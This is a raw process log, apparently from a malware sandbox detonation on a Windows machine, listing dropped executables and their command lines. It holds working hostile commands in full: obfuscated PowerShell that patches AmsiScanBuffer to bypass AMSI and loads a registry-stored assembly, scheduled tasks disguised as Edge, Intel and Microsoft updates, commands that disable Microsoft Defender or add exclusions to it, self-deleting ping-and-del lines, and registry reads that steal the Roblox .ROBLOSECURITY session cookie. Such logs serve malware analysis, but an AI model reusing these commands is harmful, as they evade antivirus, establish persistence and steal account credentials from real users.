C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp2989.tmp"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe
"C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\888.exe
"C:\Users\Admin\AppData\Local\Temp\a\888.exe"
C:\Users\Admin\AppData\Local\Temp\a\50to.exe
"C:\Users\Admin\AppData\Local\Temp\a\50to.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:IhIYpxIFcgyp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$iGdgBFEJVNdXFn,[Parameter(Position=1)][Type]$cORkSOTPZP)$iSTiIuxtnsW=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+'o'+'d'+'ule',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+'le'+'d'+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+'i'+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+'toC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$iSTiIuxtnsW.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+'a'+'l'+''+[Char](78)+'a'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'eBy'+[Char](83)+''+'i'+'g'+[Char](44)+'P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$iGdgBFEJVNdXFn).SetImplementationFlags('R'+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+'g'+'e'+[Char](100)+'');$iSTiIuxtnsW.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+'k'+'e',''+[Char](80)+''+'u'+''+[Char](98)+'li'+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+''+'e'+'w'+[Char](83)+'l'+[Char](111)+'t'+','+''+[Char](86)+'i'+'r'+''+'t'+'u'+[Char](97)+''+'l'+'',$cORkSOTPZP,$iGdgBFEJVNdXFn).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+'M'+'an'+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $iSTiIuxtnsW.CreateType();}$nlvkduqkZTZcW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'t'+[Char](101)+'m.'+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+''+[Char](46)+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+'U'+[Char](110)+'sa'+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+'tho'+'d'+''+'s'+'');$bgERocHrCpJknq=$nlvkduqkZTZcW.GetMethod(''+[Char](71)+'e'+'t'+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+'d'+''+'d'+''+[Char](114)+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+'t'+'a'+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DTpbqLEALYnZDkiwoQJ=IhIYpxIFcgyp @([String])([IntPtr]);$ZGluQFTyjlPvCkISWArwNu=IhIYpxIFcgyp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PNhUhOubGQt=$nlvkduqkZTZcW.GetMethod(''+'G'+'etM'+[Char](111)+'du'+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+'d'+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+'d'+'l'+''+[Char](108)+'')));$EPAqehSgElyedt=$bgERocHrCpJknq.Invoke($Null,@([Object]$PNhUhOubGQt,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+'yA')));$nzQbtsGqlAJGwXnHA=$bgERocHrCpJknq.Invoke($Null,@([Object]$PNhUhOubGQt,[Object]('Vir'+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+''+'t'+''+'e'+'c'+'t'+'')));$fsdzaNt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EPAqehSgElyedt,$DTpbqLEALYnZDkiwoQJ).Invoke('a'+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$QoEpoKCnSzvHdWsxV=$bgERocHrCpJknq.Invoke($Null,@([Object]$fsdzaNt,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+'u'+'ff'+'e'+'r')));$tMmAECOwaM=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nzQbtsGqlAJGwXnHA,$ZGluQFTyjlPvCkISWArwNu).Invoke($QoEpoKCnSzvHdWsxV,[uint32]8,4,[ref]$tMmAECOwaM);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QoEpoKCnSzvHdWsxV,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nzQbtsGqlAJGwXnHA,$ZGluQFTyjlPvCkISWArwNu).Invoke($QoEpoKCnSzvHdWsxV,[uint32]8,0x20,[ref]$tMmAECOwaM);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+'W'+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'r'+'ut'+[Char](115)+'s'+[Char](116)+'a'+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a5fe6155-dd2c-4481-8307-6c530f1c484b}
C:\Windows\system32\lsass.exe
"C:\Windows\system32\lsass.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im conhost.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\a\info.exe
"C:\Users\Admin\AppData\Local\Temp\a\info.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\regedit.exe
regedit /s "C:\Windows\SysWOW64\ruts\11.reg
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Users\Admin\AppData\Local\Temp\a\50.exe
"C:\Users\Admin\AppData\Local\Temp\a\50.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c delete.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cbKEIYxfLOuZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zkkByHJHlOEUfI,[Parameter(Position=1)][Type]$jNXhuSJyuE)$kuXhIwXmRtq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'fl'+'e'+''+'c'+''+[Char](116)+''+'e'+''+[Char](100)+'D'+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+'e'+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+'l'+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+'e',''+'C'+''+[Char](108)+''+[Char](97)+'ss,P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c,'+'S'+''+[Char](101)+''+[Char](97)+'l'+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+'A'+'u'+''+'t'+''+'o'+''+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$kuXhIwXmRtq.DefineConstructor('R'+'T'+''+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+'a'+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+[Char](101)+'By'+[Char](83)+''+'i'+'g'+[Char](44)+''+[Char](80)+'ublic',[Reflection.CallingConventions]::Standard,$zkkByHJHlOEUfI).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+',Ma'+'n'+'age'+[Char](100)+'');$kuXhIwXmRtq.DefineMethod(''+'I'+''+'n'+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','Pu'+[Char](98)+''+'l'+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+''+'d'+'e'+'B'+''+[Char](121)+'Sig'+[Char](44)+''+[Char](78)+''+'e'+'wS'+'l'+''+'o'+''+'t'+''+','+''+[Char](86)+''+[Char](105)+''+'r'+'tu'+'a'+''+[Char](108)+'',$jNXhuSJyuE,$zkkByHJHlOEUfI).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+'age'+[Char](100)+'');Write-Output $kuXhIwXmRtq.CreateType();}$TowgBpqykWRdH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+'s'+'');$gZEYvIJFLLvQLY=$TowgBpqykWRdH.GetMethod(''+'G'+''+'e'+''+'t'+''+'P'+''+'r'+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+'d'+''+'r'+'e'+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+'c,S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aIHWGzmkcfbXwgMKaID=cbKEIYxfLOuZ @([String])([IntPtr]);$MbJXigrefTaFlOHFefPhpV=cbKEIYxfLOuZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$QlXnRBRAGji=$TowgBpqykWRdH.GetMethod(''+'G'+'et'+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+'e'+'H'+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+'e'+''+'l'+'32'+[Char](46)+'d'+[Char](108)+''+'l'+'')));$MdhHeMtBjRszmk=$gZEYvIJFLLvQLY.Invoke($Null,@([Object]$QlXnRBRAGji,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+'ar'+'y'+''+[Char](65)+'')));$XUXWoQgqYfzJkHLAq=$gZEYvIJFLLvQLY.Invoke($Null,@([Object]$QlXnRBRAGji,[Object](''+'V'+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$Aoekwpv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MdhHeMtBjRszmk,$aIHWGzmkcfbXwgMKaID).Invoke('a'+[Char](109)+'si'+[Char](46)+'d'+'l'+''+'l'+'');$ywzeyZnIMfSbWqxrx=$gZEYvIJFLLvQLY.Invoke($Null,@([Object]$Aoekwpv,[Object]('A'+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$fcObEGUKYy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XUXWoQgqYfzJkHLAq,$MbJXigrefTaFlOHFefPhpV).Invoke($ywzeyZnIMfSbWqxrx,[uint32]8,4,[ref]$fcObEGUKYy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ywzeyZnIMfSbWqxrx,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XUXWoQgqYfzJkHLAq,$MbJXigrefTaFlOHFefPhpV).Invoke($ywzeyZnIMfSbWqxrx,[uint32]8,0x20,[ref]$fcObEGUKYy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](114)+''+[Char](117)+''+[Char](116)+''+'s'+''+'s'+''+[Char](116)+'a'+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\SH.exe
"C:\Users\Admin\AppData\Local\Temp\a\SH.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
"C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
"C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe -run_agent -second
C:\Users\Admin\AppData\Local\Temp\a\qwex.exe
"C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\XW.exe
"C:\Users\Admin\AppData\Local\Temp\a\XW.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"
C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
"C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"
C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
"C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"
C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
"C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"
C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe
"C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe"
C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe"
C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe
"C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe
"C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe"
C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe"
C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe
"C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1324 -s 320
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\boleto.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 608 -p 3520 -ip 3520
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3520 -s 2180
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe
"C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe"
C:\Windows\SysWOW64\msiexec.exe
msiexec /i vcredist.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2324 -ip 2324
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1200
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{bbdceaac-ed42-4d86-a1df-4449fb89d1a3}
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 7D5ABB851EBB1EA598FA427462D75E36
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4820 -ip 4820
C:\Users\Admin\AppData\Local\Temp\a\jy.exe
"C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
C:\Users\Admin\AppData\Local\Temp\is-83LAL.tmp\jy.tmp
"C:\Users\Admin\AppData\Local\Temp\is-83LAL.tmp\jy.tmp" /SL5="$E01EA,1888137,52736,C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1292
C:\Users\Admin\AppData\Local\Temp\a\test30.exe
"C:\Users\Admin\AppData\Local\Temp\a\test30.exe"
